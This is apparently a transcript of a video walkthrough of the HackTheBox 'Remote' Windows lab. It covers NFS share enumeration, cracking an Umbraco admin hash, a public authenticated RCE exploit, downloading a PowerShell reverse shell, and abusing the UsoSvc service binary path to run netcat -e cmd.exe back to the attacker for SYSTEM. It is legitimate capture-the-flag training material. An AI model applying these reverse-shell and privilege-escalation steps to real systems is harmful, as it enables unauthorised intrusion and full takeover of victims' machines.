Hey, what's up everyone? Today I'm doing remote from HackTheBox. This was a pretty easy Windows box. We start this box off with our Nmap Scan and find a web server and an open NFS share called Site Backups. And in the share we find a hash for the Umbraco admin and a public exploit for authenticated remote code execution that gets us on the box. And to escalate to system we use PowerUp to show that we can abuse the USO service. So we just upload netcat and trigger a reverse shell when we restart the service. So let's get started. We start this box off with nmap, sv, sc, oa, put it in the nmap directory, and we'll call it remote, and the IP address is 10.10.10.180. I've already run this, so let's take a look at the output. And we see a whole lot of stuff happening here. What stands out the most is we have mount running, possibly SMB shares on 445. We see FTP open, and we see port 80. So let's go check out port 80. Okay, and we just see welcome to Acme. And if we look through this, we just see some lorem ipsum type posts. But if we look at the source code, we can see that under CSS we see Umbraco. So maybe that's the CMS that's running. So if we take a look back at our other ports, we can see FTP is open. So let's take a look at, and it says anonymous FTP login is allowed. So let's see if there's anything in there. We don't see anything. So we can get out of here. And the other one that interested us was mount. So we can show mount -e to show the exports on 10.10.10.180. And we see site backups. So I'll make a directory called mount, and then we'll mount, and the type is NFS 10.10.10.180 site backups to mount. And it mounts. So if we go in there, what do we see? We see what looks to be maybe website backups. We see web config, the Umbraco client, which was another hint, and Umbraco, app data, app browsers. So if we looked at the files in here, so we'll just look here, type files, see if we see anything interesting. Nothing in app browsers. App data has some caches. Okay, that started going kind of fast. And if we look in here, we see models, logs, so maybe something interesting in the logs, and temp. We see a config and some kind of data file. So we can go look at the config, maybe there's something in there. And that was in app data. So we've got these two files. So if we look at Umbraco config, we see a config. Look for anything, we see an API key. Maybe that is important. So we'll just grep for password. Just forgot password. We'll look for admin. And we just see a whole bunch of stuff. Content, page IDs and keys. So this is probably stuff for the website. And then if we look at this Umbraco file, we can see it's just data. So maybe we can run strings, and we'll look for any strings bigger than 10 on Umbraco. And we see a bunch of stuff, so we can do the same thing here and grep for password. It looks like we see a username, so I'll get notes started. and then we can grep for that username to see if we see anything interesting alongside it. And it looks like we see some sign-in successes. Okay, and up here it looks like we have a SHA-1 right here. So we can see if we can crack this. And we'll just load this into CrackStation. There's a hash. I'm not a robot. This whole thing is a taxi. Crack hashes. Okay, and we get a result. We see bacon and cheese. And what do we do with this? Well, if we go back and we look over here, we see our Umbraco CMS, so we can just look for Umbraco exploits. And second result, we see an RCE. And it's pretty much just a Python script. Takes in a user pass command and arguments. So we'll just go ahead and grab this, test it out. Okay, so it wants the user, which was admin at htb.local, the pass, which was bacon and cheese, the command, which will try cmd.exe, and the arguments, which will do ping our IP address 10.10.10.10.14.14 just to see if we get any callback. Okay, and that should be good. So what I'm going to do here is we'll tcpdump, and the interface we want is ton0, and we want to listen for ICMP packets. So we'll send that off, see if it does anything. Oh, we need to do the host, which is -i. HTTP 10.10.10.180. Let that go. See if anything happens. Okay, nothing seems to be happening. I'm gonna kill that and we'll try it again. And we'll try it with PowerShell. Okay, we can see we got all the pings back pretty much immediately. And we see the reply right here. Oh, so I could probably just... I was doing that so I'd see output, but if I just did this and did who am I, it might print it directly here. Yeah, okay, so it's just code execution on the box, okay. And it does the output right there for us. So I could... From here, we could do invoke web request, HTTP 10.10.14.14. See if we can use that to get test and see what happens. I need a Python listener. Unable to connect to remote server, so it looks like that's gonna work. So we can come here, and we can actually, I have a opt reverse shells, and we can copy PS1 shell here. Oh, I'm in mount. Okay, so we need to get out of that. Okay, and if we look at it, okay, whatever. We can just go to here, change our IP address to 10.10.14.14, and we'll do 443. set up our HTTP server on port 80, set up a netcat listener on 443, grab our shell.ps1 out file, c shell.ps1. I'm not sure if I can write there, but we'll see. Okay, yeah, I didn't like that. So we will first make directory c temp, can I just do it that way then? Okay, so / is fine. So then our out file will be c temp shell.ps1. Okay, so it looks like it grabbed our shell successfully. So now we can just run it with PowerShell c temp ps1 shell.ps1. And we get a connect back. So I'll kind of resize this window. And who am I? Looks like we are a default app pool. So if we go to C, users, see what's in here. We have public, go into public, and we can see user.text. So that's user done. Now we need to escalate to system. I'm going to use power up, which I believe is by Harmjoy. Power up PS1. I think he wrote this. He might not have written this, but he has a great guide on it. I'm pretty sure he did write it though. Okay, so we can pretty much just use it, import it, and invoke all checks, and it'll tell us some pretty cool stuff. So I'm going to copy, I think I have it in privesc. You can just download it if you don't have it. It's in privesc, Windows, power up PS1. Okay, so we'll do the same thing, and then we're going to IWR, HTTP, 1010, well, we'll go to ctemp first, and then we'll IWR for invoke web request, HTTP, our IP address, 1010.14.14, and power up.ps1, and out file, power up.ps1. It looks like it grabbed it just fine, so we can invoke import module. Power up.ps1, and then we can invoke all checks, let this run, and we can look at the output. Okay, it just finished running. So if we scroll back up, it looks like we have maybe an unattended path, nothing, but it does tell us that we have a service permission that we can change. So we can abuse the USO service. So what we can do is we can use sc.exe config UsoSvc and set the binary path. So we'll do binpath equals and then something here. So I'm gonna copy that real quick, because what I'm gonna do first is kill this, and I'm gonna copy user share Windows resources binaries netcat, and we're gonna copy over netcat so we can IWR our netcat. delete this. And so now we have netcat on the box. So if we set that service path, or the binary path to be what's run when the service is started, we could say ctemp netcat.exe. I'm not sure if I need to do forward or backslashes here. I guess we can try both ways. Temp netcat.exe, and we'll do -e cmd.exe, our IP address 10.10.14.14, and we will listen on port 443 again. Okay, so we'll try this, and it said we were able to change the service, so we can just stop the service. sc.exe stop and the service name. So we've got a stop pending. Looks like maybe it's not stoppable or something. So then we could svc start UsoSvc. And it was able to start. But we didn't get a connect back. So let's try this again. And this time we will use the other slashes. cmd.exe, our IP address. Okay, set the service path. Oh, I also ran svc start, and I meant to run sc.exe start. Okay, well, the other one may have worked. I guess we'll never know. I could just try it again, if this doesn't work. Start UsoSvc, and we get a shell back. So who am I? NT authority system, and we own the box. So I'm gonna kill this, and I'm going to try this again with the other slash, because I'm pretty sure it'll work. I just didn't type anything, or type it correctly. Temp netcat.exe -e cmd.exe 10.10.14.14.443, and then sc.exe stop UsoSvc sc.exe start UsoSvc, get our listener going, and it does work. So who am I? NT authority system. Heading over to C users. We can go into administrator. Desktop. And we have root.txt right here. Okay, so that's pretty much it for the box. I hope y'all enjoyed it. I'll catch you guys next week.